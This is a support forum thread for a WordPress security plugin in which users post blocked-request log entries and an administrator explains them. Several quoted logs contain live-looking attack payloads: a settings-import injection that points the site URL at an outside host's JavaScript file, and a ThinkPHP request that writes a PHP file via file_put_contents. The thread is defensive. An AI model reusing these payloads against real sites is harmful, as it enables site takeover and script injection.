Home › Forums › BulletProof Security Pro › Security Log Event Codes
Tagged: Event Codes, Security Log
- This topic has 90 replies, 22 voices, and was last updated 1 year, 2 months ago by
XavierX.
-
AuthorPosts
-
Bub
ParticipantDone and done…. Thanks. This topic should now be closed.
ParticipantAgain, thanks.
sergeykar
ParticipantI have been seeing this frequently in my security log – and it appears like a hack attempt – not sure what it is because I have not seen this in the past. It appears BPS is doing it’s job – however is there a weakness this attempt is trying to exploit?
[403 GET Request: 06.08.2019 - 10:15] BPS: 3.5 WP: 5.2.2 Event Code: WPADMIN-SBR Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/ REMOTE_ADDR: 159.69.154.78 Host Name: static.78.154.69.159.clients.your-server.de SERVER_PROTOCOL: HTTP/1.1 HTTP_CLIENT_IP: HTTP_FORWARDED: HTTP_X_FORWARDED_FOR: HTTP_X_CLUSTER_CLIENT_IP: REQUEST_METHOD: GET HTTP_REFERER: REQUEST_URI: /wp-admin/admin-ajax.php?nd_options_value_import_settings=siteurl[nd_options_option_value]https://jackielovedogs.com/pret.js?l=1&[nd_options_end_option] QUERY_STRING: nd_options_value_import_settings=siteurl[nd_options_option_value]https://jackielovedogs.com/pret.js?l=1&[nd_options_end_option] HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36
AITpro Admin
KeymasterThis is either a probe looking for existing injected hacker code in your website’s Source Code or a hacker trying to exploit an existing hack injection on your website’s Source Code. To check if your website is hacked do the steps below:
1. Go to your website’s home page.
2. Right mouse click and click View page source (google chrome) or a similar command for other Browsers.
3. Use your Browser’s Find… command (google chrome – located under settings > Find…) and enter this search string: nd_options
4. If you see/find Source Code that looks like this below then your website is hacked.
5. Let me know if your Browser Find/Search finds any search results or not.httx://expat.ca/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=jfjvc.php&vars%5B1%5D%5B%5D=%3C?php%20mb_ereg_replace(, httx://expat.ca/jfjvc.php, httx://expat.ca/wp-admin/admin-ajax.php?nd_options_value_import_settings=siteurl[nd_options_option_value]httxs://jackielovedogs.com/pret.js?l=1&[nd_options_end_option], httx://expat.ca/wp-admin/admin-post.phpnd_options_value_import_settings=home[nd_options_option_value]httxs://jackielovedogs.com/pret?l=1&[nd_options_end_option],
Chris Moon
ParticipantFound this in my Security Log and not sure what it mens:
[403 GET Request: September 19, 2020 - 23:57] BPS Pro: 14.8 WP: 5.5.1 Event Code: PFWR-PSBR-HPRA Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/ REMOTE_ADDR: GDPR Compliance On Host Name: ns4.transcomag.net SERVER_PROTOCOL: HTTP/1.1 HTTP_CLIENT_IP: GDPR Compliance On HTTP_FORWARDED: GDPR Compliance On HTTP_X_FORWARDED_FOR: GDPR Compliance On HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On REQUEST_METHOD: GET HTTP_REFERER: REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/n.php QUERY_STRING: HTTP_USER_AGENT: Mozilla [403 GET Request: September 19, 2020 - 23:57] BPS Pro: 14.8 WP: 5.5.1 Event Code: PFWR-PSBR-HPRA Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/ REMOTE_ADDR: GDPR Compliance On Host Name: ns4.transcomag.net SERVER_PROTOCOL: HTTP/1.1 HTTP_CLIENT_IP: GDPR Compliance On HTTP_FORWARDED: GDPR Compliance On HTTP_X_FORWARDED_FOR: GDPR Compliance On HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On REQUEST_METHOD: GET HTTP_REFERER: REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/accesson.php QUERY_STRING: HTTP_USER_AGENT: Mozilla [403 GET Request: September 19, 2020 - 23:57] BPS Pro: 14.8 WP: 5.5.1 Event Code: PFWR-PSBR-HPRA Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/ REMOTE_ADDR: GDPR Compliance On Host Name: ns4.transcomag.net SERVER_PROTOCOL: HTTP/1.1 HTTP_CLIENT_IP: GDPR Compliance On HTTP_FORWARDED: GDPR Compliance On HTTP_X_FORWARDED_FOR: GDPR Compliance On HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On REQUEST_METHOD: GET HTTP_REFERER: REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/upload.php QUERY_STRING: HTTP_USER_AGENT: Mozilla [403 GET Request: September 19, 2020 - 23:57] BPS Pro: 14.8 WP: 5.5.1 Event Code: PFWR-PSBR-HPRA Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/ REMOTE_ADDR: GDPR Compliance On Host Name: ns4.transcomag.net SERVER_PROTOCOL: HTTP/1.1 HTTP_CLIENT_IP: GDPR Compliance On HTTP_FORWARDED: GDPR Compliance On HTTP_X_FORWARDED_FOR: GDPR Compliance On HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On REQUEST_METHOD: GET HTTP_REFERER: REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/thumbs.php QUERY_STRING: HTTP_USER_AGENT: Mozilla [403 GET Request: September 19, 2020 - 23:57] BPS Pro: 14.8 WP: 5.5.1 Event Code: PFWR-PSBR-HPRA Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/ REMOTE_ADDR: GDPR Compliance On Host Name: ns4.transcomag.net SERVER_PROTOCOL: HTTP/1.1 HTTP_CLIENT_IP: GDPR Compliance On HTTP_FORWARDED: GDPR Compliance On HTTP_X_FORWARDED_FOR: GDPR Compliance On HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On REQUEST_METHOD: GET HTTP_REFERER: REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/x.php QUERY_STRING: HTTP_USER_AGENT: Mozilla [403 GET Request: September 19, 2020 - 23:57] BPS Pro: 14.8 WP: 5.5.1 Event Code: PFWR-PSBR-HPRA Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/ REMOTE_ADDR: GDPR Compliance On Host Name: ns4.transcomag.net SERVER_PROTOCOL: HTTP/1.1 HTTP_CLIENT_IP: GDPR Compliance On HTTP_FORWARDED: GDPR Compliance On HTTP_X_FORWARDED_FOR: GDPR Compliance On HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On REQUEST_METHOD: GET HTTP_REFERER: REQUEST_URI: /wp-content/plugins/quiz-master-next/js/admin.js QUERY_STRING: HTTP_USER_AGENT: Mozilla
Keymaster@ Chris Moon – These are typical hacker recon/searches for known plugins with security vulnerabilities. The BPS Pro Plugin Firewall protects all plugin files in the WordPress /plugins/ folder. So these recons/searches were blocked by the BPS Pro Plugin Firewall.
ParticipantThanks Ed, that’s reassuring.
bataraha
ParticipantThanks for confirming the solution. Also we are trying several different methods to try and get the exact solution that is needed in Phase 2 Security Log Solution Targeting on the frontend of the site so that it is logged with the exact solution in the Security Log, but we keep running into a website performance problem. A website performance decrease of even .1 (point 1) seconds is not acceptable so it is looking like the backend troubleshooting tool is going to be the only way to go.
Keymaster@ bataraha – BPS does not cause any website performance slowness and can actually speed up website performance.
Max Parker
Participantinteresting information
meets korun
Participantthanks
Sanjeev
ParticipantIf the plugin isn’t installed, treat any requests related to it as potential hacker activity. No need to engage; simply ignore as it’s unrelated to your site’s setup.
Keymaster@ Samx – BPS is a WordPress security plugin for website security.
XavierX
ParticipantHi, I was recently blocked from my own site when editing my homepage – I was doing multiple image changes and then checking my frontend to see the updates. I was editing the same page for at least 1 hour and just swapping out images to try in the page content. I was blocked on my normal IP address (I then used a VPN to get access to my site again, which was eventually blocked after further edits to my homepage).
Also, while looking through the logs, I noticed an alert for Wordfence, so I’ve added that log too. There are multiple logs for both issues, but I’ve just included one example of each.
Many thanks!
[403 POST Request: 11 July 2024 - 04:38] BPS: 6.9 WP: 6.5.5 Event Code: WPADMIN-SBR Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/ REMOTE_ADDR: GDPR Compliance On Host Name: 45.133.172.61 SERVER_PROTOCOL: HTTP/1.1 HTTP_CLIENT_IP: GDPR Compliance On HTTP_FORWARDED: GDPR Compliance On HTTP_X_FORWARDED_FOR: GDPR Compliance On HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On REQUEST_METHOD: POST HTTP_REFERER: https://www.casinosetc.co.uk/wp-admin/post.php?post=490&action=edit REQUEST_URI: /wp-admin/admin-ajax.php QUERY_STRING: HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 OPR/111.0.0.0 REQUEST BODY: BPS Security Log option set to: Do Not Log POST Request Body Data [403 GET Request: 11 July 2024 - 12:53] BPS: 6.9 WP: 6.5.5 Event Code: WPADMIN-SBR Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/ REMOTE_ADDR: GDPR Compliance On Host Name: uk8.wpx.net SERVER_PROTOCOL: HTTP/1.1 HTTP_CLIENT_IP: GDPR Compliance On HTTP_FORWARDED: GDPR Compliance On HTTP_X_FORWARDED_FOR: GDPR Compliance On HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On REQUEST_METHOD: GET HTTP_REFERER: REQUEST_URI: /wp-admin/admin-ajax.php?action=wordfence_doScan&isFork=0&scanMode=quick&cronKey=e55fbca9df22a8a00b98fb953154be23&signature=3cc1f32ec9dd175593e7470d6457c83a4bebcea93226b7635fff1b8c50ba1f3f QUERY_STRING: action=wordfence_doScan&isFork=0&scanMode=quick&cronKey=e55fbca9df22a8a00b98fb953154be23&signature=3cc1f32ec9dd175593e7470d6457c83a4bebcea93226b7635fff1b8c50ba1f3f HTTP_USER_AGENT: WordPress/6.5.5; https://www.casinosetc.co.uk
KeymasterBPS does not block by IP address, but Wordfence does.
-
AuthorPosts
- You must be logged in to reply to this topic.